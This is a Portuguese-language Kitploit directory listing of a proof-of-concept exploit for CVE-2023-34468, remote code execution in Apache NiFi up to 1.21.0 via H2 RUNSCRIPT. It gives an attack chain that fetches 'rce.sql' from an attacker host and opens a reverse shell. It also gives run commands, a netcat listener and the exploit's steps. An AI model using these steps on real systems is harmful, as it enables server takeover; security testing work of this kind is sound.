Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-34468-POC — Exploit de Prova de Conceito para CVE-2023-34468 — RCE via H2 RUNSCRIPT no Apache NiFi <= 1.21.0 | Kitploit
Ferramentas/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

Exploit de Prova de Conceito para CVE-2023-34468 — RCE via H2 RUNSCRIPT no Apache NiFi <= 1.21.0

Ver Repositório
4há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-34468 — Prova de Conceito de RCE no Apache NiFi 1.21.0

Execução Remota de Código via RUNSCRIPT do Banco H2 no Apache NiFi <= 1.21.0


Vulnerabilidade

O Apache NiFi inclui um JAR do banco de dados H2 por padrão. O serviço de controlador DBCPConnectionPool pode ser configurado para usar esse driver H2. O H2 suporta uma instrução RUNSCRIPT que busca e executa um arquivo SQL de uma URL remota. Esse arquivo SQL pode definir código Java arbitrário via CREATE ALIAS e executá-lo no SO do servidor.

Cadeia de ataque:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

Versões Afetadas

SoftwareVersão
Apache NiFi<= 1.21.0
Corrigido em1.21.1+
JavaQualquer (incluído)

Requisitos

  • Python 3.x
  • requests library → pip install requests
  • Alvo NiFi com acesso de escrita anônimo OU credenciais válidas
  • Acesso de rede do alvo à sua máquina (para callback do reverse shell)

Uso

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

Argumentos


Configuração

Terminal 1 — ouvinte:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — exploit:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

O que o PoC Faz

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
Baixar ferramenta
ArgumentoPadrãoDescrição
--targethttp://NiFi.target.comURL base do NiFi alvo
--lhost10.10.10.10Seu IP (tun0)
--lport4444Porta do listener do reverse shell
--http-port80Porta para servir rce.sql
--cleanupFalseExcluir artefatos criados após execução